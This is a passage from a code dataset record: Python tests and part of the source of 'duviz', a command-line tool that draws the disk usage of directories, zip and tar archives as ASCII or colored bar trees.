10),\n }),\n})\n\nTREE80 = SizeTree(\"foo\", 80, children={\n \"vy\": SizeTree(\"vy\", 50, children={\n \"a\": SizeTree(\"a\", 20),\n \"b\": SizeTree(\"b\", 9),\n \"c\": SizeTree(\"c\", 10),\n \"d\": SizeTree(\"d\", 11),\n }),\n \"dy\": SizeTree(\"dy\", 11, children={\n \"py\": SizeTree(\"py\", 11),\n }),\n \"do\": SizeTree(\"do\", 9, children={\n \"po\": SizeTree(\"po\", 9),\n }),\n \"da\": SizeTree(\"da\", 10, ),\n})\n\n\[email protected](\n [\"tree\", \"width\", \"expected\"],\n [\n (TREE123, 4, [\n \"____\",\n \"[fo]\",\n \"[12]\"\n ]),\n (TREE123, 5, [\n \"_____\",\n \"[foo]\",\n \"[123]\"\n ]),\n (TREE123, 10, [\n \"__________\",\n \"[ foo ]\",\n \"[__123___]\"\n 
]),\n (TREE123, 20, [\n \"____________________\",\n \"[ foo ]\",\n \"[_______123________]\"\n ]),\n (TREE60, 18, [\n \"__________________\",\n \"[ foo ]\",\n \"[_______60_______]\",\n \"[ bar ][baz ]\",\n \"[____40____][_20_]\",\n \"[ xe ][v] [p] \",\n \"[_20_][1] [1] \",\n ]),\n (TREE60, 36, [\n \"____________________________________\",\n \"[ foo ]\",\n \"[________________60________________]\",\n \"[ bar ][ baz ]\",\n \"[__________40__________][____20____]\",\n \"[ xe ][ vo ] [ pu ] \",\n \"[____20____][_10_] [_10_] \",\n ]),\n (TREE60, 60, [\n \"____________________________________________________________\",\n \"[ foo ]\",\n \"[____________________________60____________________________]\",\n \"[ bar ][ baz ]\",\n \"[__________________40__________________][________20________]\",\n \"[ xe ][ vo ] [ pu ] \",\n \"[________20________][___10___] [___10___] \",\n ]),\n ]\n)\ndef test_ascii_double_line_bar_renderer(tree, width, expected):\n assert AsciiDoubleLineBarRenderer().render(tree, width=width) == expected\n\n\[email protected](\n [\"tree\", \"width\", \"expected\"],\n [\n (TREE123, 5, [\"[foo]\"]),\n (TREE123, 10, [\"[foo: 123]\"]),\n (TREE123, 20, [\"[.... foo: 123 ....]\"]),\n (TREE60, 18, [\n \"[... foo: 60 ....]\",\n \"[ bar: 40 .][baz:]\",\n \"[xe: ][v] [p] \",\n\n ]),\n (TREE60, 36, [\n \"[............ foo: 60 .............]\",\n \"[...... bar: 40 .......][ baz: 20 .]\",\n \"[. xe: 20 .][vo: ] [pu: ] \",\n\n ]),\n (TREE60, 60, [\n \"[........................ foo: 60 .........................]\",\n \"[.............. bar: 40 ...............][.... baz: 20 .....]\",\n \"[..... xe: 20 .....][ vo: 10 ] [ pu: 10 ] \",\n ]\n )\n ]\n)\ndef test_ascii_single_line_bar_renderer(tree, width, expected):\n assert AsciiSingleLineBarRenderer().render(tree, width=width) == expected\n\n\ndef test_colorize_rgy():\n clz = Colorizer()\n marked = \"_\".join(clz.wrap(t) for t in [\"AAA\", \"BBB\", \"CCC\", \"DDD\", \"EEE\"])\n colorize = clz.get_colorize_rgy()\n expected = \"\\x1b[41;97mAAA\\x1b[0m_\\x1b[42;30mBBB\\x1b[0m_\\x1b[43;30mCCC\\x1b[0m\" \\\n \"_\\x1b[41;97mDDD\\x1b[0m_\\x1b[42;30mEEE\\x1b[0m\"\n assert colorize(marked) == expected\n\n\ndef test_colorize_bmc():\n clz = Colorizer()\n marked = \"_\".join(clz.wrap(t) for t in [\"AAA\", \"BBB\", \"CCC\", \"DDD\", \"EEE\"])\n colorize = clz.get_colorize_bmc()\n expected = \"\\x1b[44;97mAAA\\x1b[0m_\\x1b[45;30mBBB\\x1b[0m_\\x1b[46;30mCCC\\x1b[0m\" \\\n \"_\\x1b[44;97mDDD\\x1b[0m_\\x1b[45;30mEEE\\x1b[0m\"\n assert colorize(marked) == expected\n\n\[email protected](\n [\"tree\", \"width\", \"expected\"],\n [\n (TREE123, 5, [\n \"\\x1b[41;97m foo \\x1b[0m\",\n \"\\x1b[41;97m 123 \\x1b[0m\",\n ]),\n (TREE123, 10, [\n \"\\x1b[41;97m foo \\x1b[0m\",\n \"\\x1b[41;97m 123 \\x1b[0m\"\n ]),\n (TREE80, 40, [\n \"\\x1b[41;97m foo \\x1b[0m\",\n \"\\x1b[41;97m 80 \\x1b[0m\",\n \"\\x1b[44;97m vy \\x1b[0m\\x1b\"\n + \"[45;30m dy \\x1b[0m\\x1b[46;30m da \\x1b[0m\\x1b[44;97m do \\x1b[0m\",\n \"\\x1b[44;97m 50 \\x1b[0m\\x1b\"\n + \"[45;30m 11 \\x1b[0m\\x1b[46;30m 10 \\x1b[0m\\x1b[44;97m 9 \\x1b[0m\",\n \"\\x1b[42;30m a \\x1b[0m\\x1b[43;30m d \\x1b[0m\\x1b[41;97m c \\x1b[0m\\x1b[42;30m b \\x1b[0m\"\n + \"\\x1b[43;30m py \\x1b[0m \\x1b[41;97m po \\x1b[0m\",\n \"\\x1b[42;30m 20 \\x1b[0m\\x1b[43;30m 11 \\x1b[0m\\x1b[41;97m 10 \\x1b[0m\\x1b[42;30m 9 \\x1b[0m\"\n + \"\\x1b[43;30m 11 \\x1b[0m \\x1b[41;97m 9 \\x1b[0m\"\n ])\n ]\n)\ndef test_color_double_line_bar_renderer(tree, width, expected):\n assert ColorDoubleLineBarRenderer().render(tree, width=width) == 
expected\n\n\[email protected](\n [\"tree\", \"width\", \"expected\"],\n [\n (TREE123, 5, [\"\\x1b[41;97mfoo: \\x1b[0m\"]),\n (TREE123, 10, [\"\\x1b[41;97m foo: 123 \\x1b[0m\"]),\n (TREE80, 40, [\n \"\\x1b[41;97m foo: 80 \\x1b[0m\",\n \"\\x1b[44;97m vy: 50 \\x1b[0m\"\n + \"\\x1b[45;30mdy: 1\\x1b[0m\\x1b[46;30mda: 1\\x1b[0m\\x1b[44;97mdo: 9\\x1b[0m\",\n \"\\x1b[42;30m a: 20 \\x1b[0m\\x1b[43;30md: 11\\x1b[0m\\x1b[41;97mc: 10\\x1b[0m\\x1b[42;30m b: 9\\x1b[0m\"\n + \"\\x1b[43;30mpy: 1\\x1b[0m \\x1b[41;97mpo: 9\\x1b[0m\",\n ])\n ]\n)\ndef test_color_single_line_bar_renderer(tree, width, expected):\n assert ColorSingleLineBarRenderer().render(tree, width=width) == expected\n\n\[email protected](\n [\"x\", \"expected\"],\n [\n (0, '0'),\n (10, '10'),\n (999, '999'),\n (1000, '1.00k'),\n (5432, '5.43k'),\n (5678, '5.68k'),\n (999990, '999.99k'),\n (999999, '1.00M'),\n (1000000, '1.00M'),\n (1000000000, '1.00G'),\n (1000000000000, '1.00T'),\n ]\n)\ndef test_formatter_count(x, expected):\n assert expected == SIZE_FORMATTER_COUNT.format(x)\n\n\[email protected](\n [\"x\", \"expected\"],\n [\n (0, '0B'),\n (10, '10B'),\n (999, '999B'),\n (1000, '1.00KB'),\n (5432, '5.43KB'),\n (5678, '5.68KB'),\n (999990, '999.99KB'),\n (999999, '1.00MB'),\n (1000000, '1.00MB'),\n ]\n)\ndef test_formatter_bytes(x, expected):\n assert expected == SIZE_FORMATTER_BYTES.format(x)\n\n\[email protected](\n [\"x\", \"expected\"],\n [\n (0, '0B'),\n (10, '10B'),\n (999, '999B'),\n (1000, '1000B'),\n (1023, '1023B'),\n (1024, '1.00KiB'),\n (5432, '5.30KiB'),\n (1000000, '976.56KiB'),\n (1024 * 1024, '1.00MiB'),\n (1024 * 1024 * 1024, '1.00GiB'),\n (1024 * 1024 * 1024 * 1024, '1.00TiB'),\n ]\n)\ndef test_formatter_bytes_binary(x, expected):\n assert expected == SIZE_FORMATTER_BYTES_BINARY.format(x)\n\n\[email protected](\n [\"path\", \"expected\"],\n [\n ('aa', ['aa']),\n ('aa/', ['aa']),\n ('aa/bB', ['aa', 'bB']),\n ('/aA/bB/c_c', ['/', 'aA', 'bB', 'c_c']),\n ('/aA/bB/c_c/', ['/', 'aA', 'bB', 'c_c']),\n ]\n)\ndef test_path_split(path, expected):\n assert expected == path_split(path)\n\n\[email protected](\n [\"path\", \"base\", \"expected\"],\n [\n ('aa', 'a', ['aa']),\n ('aa/', '', ['aa']),\n ('a/b/c/d/', 'a', ['a', 'b', 'c', 'd']),\n ('a/b/c/d/', 'a/b', ['a/b', 'c', 'd']),\n ('a/b/c/d/', 'a/b/', ['a/b', 'c', 'd']),\n ('a/b/c/d/', 'a/b/c', ['a/b/c', 'd']),\n ('a/b/c/d/', 'a/b/c/d', ['a/b/c/d']),\n ('a/b/c/d', 'a/b/c/d/', ['a/b/c/d']),\n ('a/b/c/d', 'a/B', ['a', 'b', 'c', 'd']),\n ]\n)\ndef test_path_split_with_base(path, base, expected):\n assert expected == path_split(path, base)\n\n\ndef _dedent(s: str) -> str:\n \"\"\"Helper to unindent strings for quick and easy text listings\"\"\"\n return textwrap.dedent(s.lstrip(\"\\n\").rstrip(\" \"))\n\n\ndef _dedent_and_split(s: str) -> List[str]:\n return _dedent(s).strip(\"\\n\").split(\"\\n\")\n\n\[email protected]([\"input\", \"output\"], [\n (\"foo\", \"foo\"),\n (\" foo\\n bar\", \"foo\\nbar\"),\n (\"\\n foo\\n bar\", \"foo\\nbar\"),\n (\"\\n foo\\n bar\\n\", \"foo\\nbar\\n\"),\n (\"\\n foo\\n bar\\n \", \"foo\\nbar\\n\"),\n (\"\\n foo\\n bar\\n \", \"foo\\n bar\\n\"),\n (\"\\n foo\\n bar\\n \", \" foo\\nbar\\n\"),\n])\ndef test_dedent(input, output):\n assert _dedent(input) == output\n\n\[email protected]([\"input\", \"output\"], [\n (\"foo\", [\"foo\"]),\n (\" foo\\n bar\", [\"foo\", \"bar\"]),\n (\"\\n foo\\n bar\", [\"foo\", \"bar\"]),\n (\"\\n foo\\n bar\\n\", [\"foo\", \"bar\"]),\n (\"\\n foo\\n bar\\n \", [\"foo\", \"bar\"]),\n (\"\\n foo\\n bar\\n \", [\"foo\", \" 
bar\"]),\n (\"\\n foo\\n bar\\n \", [\" foo\", \"bar\"]),\n])\ndef test_dedent_and_split(input, output):\n assert _dedent_and_split(input) == output\n\n\ndef test_build_du_tree1():\n directory = 'path/to'\n du_listing = _dedent_and_split('''\n 120 path/to/foo\n 10 path/to/bar/a\n 163 path/to/bar/b\n 360 path/to/bar/c\n 612 path/to/bar\n 2 path/to/s p a c e s\n 800 path/to\n ''')\n tree = DuProcessor.from_du_listing(directory, du_listing)\n renderer = AsciiDoubleLineBarRenderer(size_formatter=SIZE_FORMATTER_BYTES)\n result = renderer.render(tree, width=40)\n expected = _dedent_and_split('''\n ________________________________________\n [ path/to ]\n [_______________819.20KB_______________]\n [ bar ][foo ] \\n\\\n [__________626.69KB__________][122.] \\n\\\n [ c ][ b ]| \\n\\\n [____368.64KB___][166.91]| \\n\\\n ''')\n assert result == expected\n\n\ndef test_build_du_tree2():\n directory = 'path/to'\n du_listing = _dedent_and_split('''\n 1 path/to/A\n 1 path/to/b\n 2 path/to/C\n 4 path/to\n ''')\n tree = DuProcessor.from_du_listing(directory, du_listing)\n renderer = AsciiDoubleLineBarRenderer(size_formatter=SIZE_FORMATTER_BYTES)\n result = renderer.render(tree, width=40)\n expected = _dedent_and_split('''\n ________________________________________\n [ path/to ]\n [________________4.10KB________________]\n [ C ][ b ][ A ]\n [______2.05KB______][_1.02KB_][_1.02KB_]\n ''')\n assert result == expected\n\n\ndef _check_ls_listing_render(ls_listing: str, expected: str, directory='path/to', width=40):\n \"\"\"Helper to parse a ls listing, render as ASCII bars and check result\"\"\"\n tree = InodeProcessor.from_ls_listing(\n root=directory, ls_listing=_dedent(ls_listing)\n )\n result = AsciiDoubleLineBarRenderer().render(tree, width=width)\n assert result == _dedent_and_split(expected)\n\n\ndef test_inode_tree_bsd_ls_simple():\n _check_ls_listing_render(\n ls_listing=\"\"\"\n 222 .\n 1 ..\n 333 file.txt\n 444 anotherfile.txt\n \"\"\",\n expected=\"\"\"\n ________________________________________\n [ path/to ]\n [__________________3___________________]\n \"\"\"\n )\n\n\ndef test_inode_tree_bsd_ls_with_hardlink():\n _check_ls_listing_render(\n ls_listing=\"\"\"\n 222 .\n 1 ..\n 333 file.txt\n 444 anotherfile.txt\n 333 hardlink.txt\n \"\"\",\n expected=\"\"\"\n ________________________________________\n [ path/to ]\n [__________________3___________________]\n \"\"\"\n )\n\n\ndef test_inode_tree_bsd_ls_subdir():\n _check_ls_listing_render(\n ls_listing=\"\"\"\n 222 .\n 1 ..\n 333 file.txt\n 444 directory\n 555 anotherfile.txt\n\n path/to/directory:\n 444 .\n 222 ..\n 666 devil.txt\n 777 god.txt\n \"\"\",\n expected=\"\"\"\n ________________________________________\n [ path/to ]\n [__________________6___________________]\n [ directory ] \\n\\\n [_____2_____] \\n\\\n \"\"\"\n )\n\n\ndef test_inode_tree_bsd_ls_various():\n _check_ls_listing_render(\n ls_listing=\"\"\"\n 2395 .\n 2393 ..\n 2849 bar\n 1166 barln\n 2845 a.txt\n 2846 b b b.txt\n 2842 c.txt\n\n path/to/A:\n 2849 .\n 2395 ..\n 2851 d.txt\n 2852 e.txt\n\n path/to/B:\n 1166 .\n 2395 ..\n 2852 bla.txt\n 1174 zaza\n \"\"\",\n expected=\"\"\"\n ________________________________________\n [ path/to ]\n [__________________9___________________]\n [ A ][ B ] \\n\\\n [__2___][_1_] \\n\\\n \"\"\"\n )\n\n\ndef test_inode_tree_gnu_ls_simple():\n _check_ls_listing_render(\n ls_listing=\"\"\"\n path/to:\n 222 .\n 1 ..\n 333 file.txt\n 444 anotherfile.txt\n \"\"\",\n expected=\"\"\"\n ________________________________________\n [ path/to ]\n 
[__________________3___________________]\n \"\"\"\n )\n\n\ndef test_inode_tree_gnu_ls_various():\n _check_ls_listing_render(\n ls_listing=\"\"\"\n path/to:\n 2395 .\n 2393 ..\n 2849 bar\n 1166 barln\n 2845 a.txt\n 2846 b b b.txt\n 2842 c.txt\n\n path/to/A:\n 2849 .\n 2395 ..\n 2851 d.txt\n 2852 e.txt\n\n path/to/B:\n 1166 .\n 2395 ..\n 2852 bla.txt\n 1174 zaza\n \"\"\",\n expected=\"\"\"\n ________________________________________\n [ path/to ]\n [__________________9___________________]\n [ A ][ B ] \\n\\\n [__2___][_1_] \\n\\\n \"\"\"\n )\n\n\ndef test_get_progress_reporter():\n output = []\n\n # Artificial time function: 1 second per call\n time = itertools.count(10).__next__\n progress = get_progress_reporter(write=lambda s: output.append(s), time=time, max_interval=10, terminal_width=10)\n for i in range(200):\n progress('path-{i}'.format(i=i))\n\n assert all(len(line.rstrip(\"\\r\")) <= 10 for line in output)\n # Extract \"printed\" path indexes\n indexes = [int(line.partition(\"-\")[-1]) for line in output]\n assert indexes[0] == 0\n # Check time deltas: initial ones should be small, final ones large\n deltas = [i1-i0 for (i0, i1) in zip(indexes[:-1], indexes[1:])]\n assert all(d < 5 for d in deltas[:5])\n assert all(d > 9 for d in deltas[-5:])\n\n\nclass TestZipFileProcessor:\n @pytest.fixture\n def zip_file(self, tmp_path):\n path = tmp_path / \"data.zip\"\n with zipfile.ZipFile(path, \"w\", compression=zipfile.ZIP_DEFLATED) as zf:\n with zf.open(\"alpha/abc100.txt\", \"w\") as f:\n f.write(b\"abcdefghijklmnopqrstuvwxyz\" * 100)\n with zf.open(\"alpha/abbcccdddde.txt\", \"w\") as f:\n f.write(b\"abbcccdddde\" * 2 * 100)\n with zf.open(\"0.txt\", \"w\") as f:\n f.write(b\"0\" * 26 * 100)\n return path\n\n def test_default(self, zip_file):\n tree = ZipFileProcessor.from_zipfile(zip_file)\n renderer = AsciiDoubleLineBarRenderer(size_formatter=SIZE_FORMATTER_BYTES)\n result = renderer.render(tree, width=40)\n expected = [\n \"________________________________________\",\n TreeRenderer.bar(label=str(zip_file), width=40),\n \"[_________________99B__________________]\",\n \"[ alpha ][ 0.txt ]\",\n \"[_____________79B_____________][__20B__]\",\n \"[ abc100.txt ][abbcccdddd] \",\n \"[_______49B_______][___30B____] \",\n ]\n assert result == expected\n\n def test_expanded(self, zip_file):\n tree = ZipFileProcessor.from_zipfile(zip_file, compressed=False)\n renderer = AsciiDoubleLineBarRenderer(size_formatter=SIZE_FORMATTER_BYTES)\n result = renderer.render(tree, width=40)\n expected = [\n \"________________________________________\",\n TreeRenderer.bar(label=str(zip_file), width=40),\n \"[________________7.40KB________________]\",\n \"[ alpha ][ 0.txt ]\",\n \"[_________4.80KB________][____2.60KB___]\",\n \"[ abc100.txt][abbcccdddd] \",\n \"[___2.60KB__][__2.20KB__] \",\n ]\n assert result == expected\n\n\ndef _create_file(path: Path, content: str) -> Path:\n path.parent.mkdir(parents=True, exist_ok=True)\n with path.open(\"w\", encoding=\"utf-8\") as f:\n f.write(content)\n return path\n\n\nclass TestTarFileProcessor:\n @pytest.fixture(params=[(\"w:\", \".tar\"), (\"w:gz\", \".tar.gz\"), (\"w:bz2\", \".tar.bz2\")])\n def tar_file(self, request, tmp_path):\n mode, ext = request.param\n path = tmp_path / f\"data{ext}\"\n with tarfile.open(path, mode) as tf:\n\n def create(rel_path: str, content: str):\n tf.add(\n name=_create_file(tmp_path / rel_path, content), arcname=rel_path\n )\n\n create(\"alpha/abc100.txt\", \"abcdefghijklmnopqrstuvwxyz\" * 100)\n create(\"alpha/abbcccdddde.txt\", 
\"abbcccdddde\" * 2 * 100)\n create(\"0.txt\", \"0\" * 26 * 100)\n return path\n\n def test_default(self, tar_file):\n tree = TarFileProcessor.from_tar_file(tar_file)\n renderer = AsciiDoubleLineBarRenderer(size_formatter=SIZE_FORMATTER_BYTES)\n result = renderer.render(tree, width=40)\n expected = [\n \"________________________________________\",\n TreeRenderer.bar(label=str(tar_file), width=40),\n \"[________________7.40KB________________]\",\n \"[ alpha ][ 0.txt ]\",\n \"[_________4.80KB________][____2.60KB___]\",\n \"[ abc100.txt][abbcccdddd] \",\n \"[___2.60KB__][__2.20KB__] \",\n ]\n assert result == expected\n"
},
{
"alpha_fraction": 0.540019154548645,
"alphanum_fraction": 0.5466817617416382,
"avg_line_length": 30.89444351196289,
"blob_id": "5ace1c7269400ef9c348d01aa62290fc9db559f2",
"content_id": "5f4a0889e4d905e16cd12b9dd8eaca69c19860fd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22964,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 720,
"path": "/duviz.py",
"repo_name": "soxofaan/duviz",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\n\"\"\"\nCommand line tool for visualization of the disk space usage of a directory\nand its subdirectories.\n\nCopyright: 2009-2023 Stefaan Lippens\nLicense: MIT\nWebsite: https://github.com/soxofaan/duviz\n\"\"\"\n\nimport argparse\nimport contextlib\nimport itertools\nimport os\nimport re\nimport shutil\nimport subprocess\nimport sys\nimport tarfile\nimport time\nimport unicodedata\nfrom typing import Any, Callable, Dict, Iterable, Iterator, List, Optional, Tuple, Union\nimport zipfile\nfrom pathlib import Path\n\n\n# TODO: catch absence/failure of du/ls subprocesses\n# TODO: how to handle unreadable subdirs in du/ls?\n# TODO: option to sort alphabetically (instead of on size)\n# TODO: use pathlib.Path instead of naive strings where appropriate\n\n\n__version__ = \"3.2.0\"\n\n\ndef path_split(path: str, base: str = \"\") -> List[str]:\n \"\"\"\n Split a file system path in a list of path components (as a recursive os.path.split()),\n optionally only up to a given base path.\n \"\"\"\n if base.endswith(os.path.sep):\n base = base.rstrip(os.path.sep)\n items = []\n while True:\n if path == base:\n items.insert(0, path)\n break\n path, tail = os.path.split(path)\n if tail != '':\n items.insert(0, tail)\n if path == '':\n break\n if path == '/':\n items.insert(0, path)\n break\n return items\n\n\nclass SubprocessException(RuntimeError):\n pass\n\n\nclass SizeTree:\n \"\"\"\n Base class for a tree of nodes where each node has a size and zero or more sub-nodes.\n \"\"\"\n\n __slots__ = [\"name\", \"size\", \"children\"]\n\n def __init__(\n self, name: str, size: int = 0, children: Optional[Dict[str, \"SizeTree\"]] = None\n ):\n self.name = name\n self.size = size\n self.children = children or {}\n\n @classmethod\n def from_path_size_pairs(\n cls,\n pairs: Iterable[Tuple[List[str], int]],\n root: str = \"/\",\n _recalculate_sizes: bool = False,\n ) -> \"SizeTree\":\n \"\"\"\n Build SizeTree from given (path, size) pairs\n \"\"\"\n tree = cls(name=root)\n for path, size in pairs:\n cursor = tree\n for component in path:\n if component not in cursor.children:\n # TODO: avoid redundancy of name: as key in children dict and as name\n cursor.children[component] = cls(name=component)\n cursor = cursor.children[component]\n cursor.size = size\n\n if _recalculate_sizes:\n # TODO: automatically detect need to recalculate sizes\n tree._recalculate_own_sizes_to_total_sizes()\n return tree\n\n def __lt__(self, other: \"SizeTree\") -> bool:\n # We only implement rich comparison method __lt__ so make sorting work.\n return (self.size, self.name) < (other.size, other.name)\n\n def _recalculate_own_sizes_to_total_sizes(self) -> int:\n \"\"\"\n If provided sizes are just own sizes and sizes of children still have to be included\n \"\"\"\n self.size = self.size + sum(c._recalculate_own_sizes_to_total_sizes() for c in self.children.values())\n return self.size\n\n\nclass DuProcessor:\n \"\"\"\n Size tree from `du` (disk usage) listings\n \"\"\"\n\n _du_regex = re.compile(r'([0-9]*)\\s*(.*)')\n\n @classmethod\n def from_du(\n cls,\n root: str,\n one_filesystem: bool = False,\n dereference: bool = False,\n progress_report: Optional[Callable[[str], None]] = None,\n ) -> SizeTree:\n # Measure size in 1024 byte blocks. 
The GNU-du option -b enables counting\n # in bytes directly, but it is not available in BSD-du.\n command = ['du', '-k']\n # Handling of symbolic links.\n if one_filesystem:\n command.append('-x')\n if dereference:\n command.append('-L')\n command.append(root)\n try:\n process = subprocess.Popen(command, stdout=subprocess.PIPE)\n except OSError:\n raise SubprocessException('Failed to launch \"du\" utility subprocess. Is it installed and in your PATH?')\n\n with contextlib.closing(process.stdout):\n return cls.from_du_listing(\n root=root,\n du_listing=(line.decode(\"utf-8\") for line in process.stdout),\n progress_report=progress_report,\n )\n\n @classmethod\n def from_du_listing(\n cls,\n root: str,\n du_listing: Iterable[str],\n progress_report: Optional[Callable[[str], None]] = None,\n ) -> SizeTree:\n def pairs(lines: Iterable[str]) -> Iterator[Tuple[List[str], int]]:\n for line in lines:\n kb, path = cls._du_regex.match(line).group(1, 2)\n if progress_report:\n progress_report(path)\n yield path_split(path, root)[1:], 1024 * int(kb)\n\n return SizeTree.from_path_size_pairs(root=root, pairs=pairs(du_listing))\n\n\nclass InodeProcessor:\n\n @classmethod\n def from_ls(\n cls, root: str, progress_report: Optional[Callable[[str], None]] = None\n ) -> SizeTree:\n command = [\"ls\", \"-aiR\", root]\n try:\n process = subprocess.Popen(command, stdout=subprocess.PIPE)\n except OSError:\n raise SubprocessException('Failed to launch \"ls\" subprocess.')\n\n with contextlib.closing(process.stdout):\n return cls.from_ls_listing(\n root=root,\n ls_listing=process.stdout.read().decode('utf-8'),\n progress_report=progress_report\n )\n\n @classmethod\n def from_ls_listing(\n cls,\n root: str,\n ls_listing: str,\n progress_report: Optional[Callable[[str], None]] = None,\n ) -> SizeTree:\n def pairs(listing: str) -> Iterator[Tuple[List[str], int]]:\n all_inodes = set()\n\n # Process data per directory block (separated by two newlines)\n blocks = listing.rstrip('\\n').split('\\n\\n')\n for i, dir_ls in enumerate(blocks):\n items = dir_ls.split('\\n')\n\n # Get current path in directory tree\n if i == 0 and not items[0].endswith(':'):\n # BSD compatibility: in first block the root directory can be omitted\n path = root\n else:\n path = items.pop(0).rstrip(':')\n\n # Collect inodes for current directory\n count = 0\n for item in items:\n inode, name = item.lstrip().split(' ', 1)\n # Skip parent entry\n if name == '..':\n continue\n # Get and process inode\n inode = int(inode)\n if inode not in all_inodes:\n count += 1\n all_inodes.add(inode)\n\n if progress_report:\n progress_report(path)\n yield path_split(path, root)[1:], count\n\n tree = SizeTree.from_path_size_pairs(\n pairs=pairs(ls_listing), root=root, _recalculate_sizes=True\n )\n return tree\n\n\nclass ZipFileProcessor:\n \"\"\"Build `SizeTree` from a file tree in a ZIP archive file.\"\"\"\n\n @staticmethod\n def from_zipfile(path: Union[str, Path], compressed: bool = True) -> SizeTree:\n # TODO: handle zipfile.BadZipFile in nicer way?\n with zipfile.ZipFile(path, mode=\"r\") as zf:\n if compressed:\n pairs = (\n (path_split(z.filename), z.compress_size) for z in zf.infolist()\n )\n else:\n pairs = ((path_split(z.filename), z.file_size) for z in zf.infolist())\n return SizeTree.from_path_size_pairs(\n pairs=pairs, root=str(path), _recalculate_sizes=True\n )\n\n\nclass TarFileProcessor:\n \"\"\"Build `SizeTree` from file tree in a tar archive file.\"\"\"\n\n @staticmethod\n def from_tar_file(path: Union[str, Path]) -> SizeTree:\n with 
tarfile.open(path, mode=\"r\") as tf:\n pairs = ((path_split(m.name), m.size) for m in tf.getmembers())\n return SizeTree.from_path_size_pairs(\n pairs=pairs, root=str(path), _recalculate_sizes=True\n )\n\n\nclass SizeFormatter:\n \"\"\"Render a (byte) count in compact human-readable way: 12, 34k, 56M, ...\"\"\"\n\n __slots__ = [\"base\", \"formats\"]\n\n def __init__(self, base: int, formats: List[str]):\n self.base = base\n self.formats = formats\n\n def format(self, size: int) -> str:\n for f in self.formats[:-1]:\n if round(size, 2) < self.base:\n return f % size\n size = float(size) / self.base\n return self.formats[-1] % size\n\n\nSIZE_FORMATTER_COUNT = SizeFormatter(1000, ['%d', '%.2fk', '%.2fM', '%.2fG', '%.2fT'])\nSIZE_FORMATTER_BYTES = SizeFormatter(1000, ['%dB', '%.2fKB', '%.2fMB', '%.2fGB', '%.2fTB'])\nSIZE_FORMATTER_BYTES_BINARY = SizeFormatter(1024, ['%dB', '%.2fKiB', '%.2fMiB', '%.2fGiB', '%.2fTiB'])\n\n\nclass TreeRenderer:\n \"\"\"Base class for SizeTree renderers\"\"\"\n\n def __init__(self, max_depth: int = 5, size_formatter: SizeFormatter = SIZE_FORMATTER_COUNT):\n self.max_depth = max_depth\n self._size_formatter = size_formatter\n\n def render(self, tree: SizeTree, width: int) -> List[str]:\n raise NotImplementedError\n\n @staticmethod\n def bar(\n label: str,\n width: int,\n fill: str = \"-\",\n left: str = \"[\",\n right: str = \"]\",\n small: str = \"|\",\n label_padding: str = \"\",\n ) -> str:\n \"\"\"\n Render a label as string of certain width with given left, right part and fill.\n\n @param label the label to be rendered (will be clipped if too long).\n @param width the desired total width\n @param fill the fill character to fill empty space\n @param left the symbol to use at the left of the bar\n @param right the symbol to use at the right of the bar\n @param small the character to use when the bar is too small\n @param label_padding additional padding for the label\n\n @return rendered string\n \"\"\"\n inner_width = width - len(left) - len(right)\n if inner_width >= 0:\n # Normalize unicode so that unicode code point count corresponds to character count as much as possible\n label = unicodedata.normalize('NFC', label)\n if len(label) < inner_width:\n label = label_padding + label + label_padding\n b = left + label[:inner_width].center(inner_width, fill) + right\n else:\n b = (small * width)[:width]\n return b\n\n\nclass AsciiDoubleLineBarRenderer(TreeRenderer):\n \"\"\"\n Render a SizeTree with two line ASCII bars,\n containing name and size of each node.\n\n Example:\n\n ________________________________________\n [ foo ]\n [_______________49.15KB________________]\n [ bar ][ baz ]\n [________32.77KB_________][__16.38KB___]\n \"\"\"\n\n _top_line_fill = '_'\n\n def render(self, tree: SizeTree, width: int) -> List[str]:\n lines = []\n if self._top_line_fill:\n lines.append(self._top_line_fill * width)\n return lines + self._render(tree, width, self.max_depth)\n\n def render_node(self, node: SizeTree, width: int) -> List[str]:\n \"\"\"Render a single node\"\"\"\n return [\n self.bar(\n label=node.name,\n width=width, fill=' ', left='[', right=']', small='|'\n ),\n self.bar(\n label=self._size_formatter.format(node.size),\n width=width, fill='_', left='[', right=']', small='|'\n )\n ]\n\n def _render(self, tree: SizeTree, width: int, depth: int) -> List[str]:\n lines = []\n if width < 1 or depth < 0:\n return lines\n\n # Render current dir.\n lines.extend(self.render_node(node=tree, width=width))\n\n # Render children.\n # TODO option to sort alphabetically\n 
children = sorted(tree.children.values(), reverse=True)\n if children:\n # Render each child as a subtree, which is a list of lines.\n subtrees = []\n cumulative_size = 0\n last_col = 0\n for child in children:\n cumulative_size += child.size\n curr_col = int(float(width * cumulative_size) / tree.size)\n subtrees.append(self._render(child, curr_col - last_col, depth - 1))\n last_col = curr_col\n # Assemble blocks.\n height = max(len(t) for t in subtrees)\n for i in range(height):\n line = ''\n for subtree in subtrees:\n if i < len(subtree):\n line += subtree[i]\n elif subtree:\n line += ' ' * self._str_len(subtree[0])\n lines.append(line + ' ' * (width - self._str_len(line)))\n\n return lines\n\n def _str_len(self, b: str) -> int:\n return len(b)\n\n\nclass AsciiSingleLineBarRenderer(AsciiDoubleLineBarRenderer):\n \"\"\"\n Render a SizeTree with one-line ASCII bars.\n\n Example:\n\n [........... foo/: 61.44KB ............]\n [.... bar: 36.86KB ....][baz: 20.48K]\n \"\"\"\n _top_line_fill = None\n\n def render_node(self, node: SizeTree, width: int) -> List[str]:\n return [\n self.bar(\n label=\"{n}: {s}\".format(n=node.name, s=self._size_formatter.format(node.size)),\n width=width, fill='.', left='[', right=']', small='|', label_padding=' '\n )\n ]\n\n\nclass Colorizer:\n # Markers to start and end a color\n _START = '\\x01'\n _END = '\\x02'\n\n # Red, Green, Yellow\n _COLOR_CYCLE_RGY = [\"\\x1b[41;97m\", \"\\x1b[42;30m\", \"\\x1b[43;30m\"]\n\n # Blue, Magenta, Cyan\n _COLOR_CYCLE_BMC = [\"\\x1b[44;97m\", \"\\x1b[45;30m\", \"\\x1b[46;30m\"]\n\n _COLOR_RESET = \"\\x1b[0m\"\n\n @classmethod\n def wrap(cls, s: str) -> str:\n \"\"\"Wrap given string in colorize markers\"\"\"\n return cls._START + s + cls._END\n\n @classmethod\n def str_len(cls, b: str) -> int:\n return len(b.replace(cls._START, \"\").replace(cls._END, \"\"))\n\n @classmethod\n def _get_colorize(cls, colors: List[str]):\n \"\"\"Construct function that replaces markers with color codes 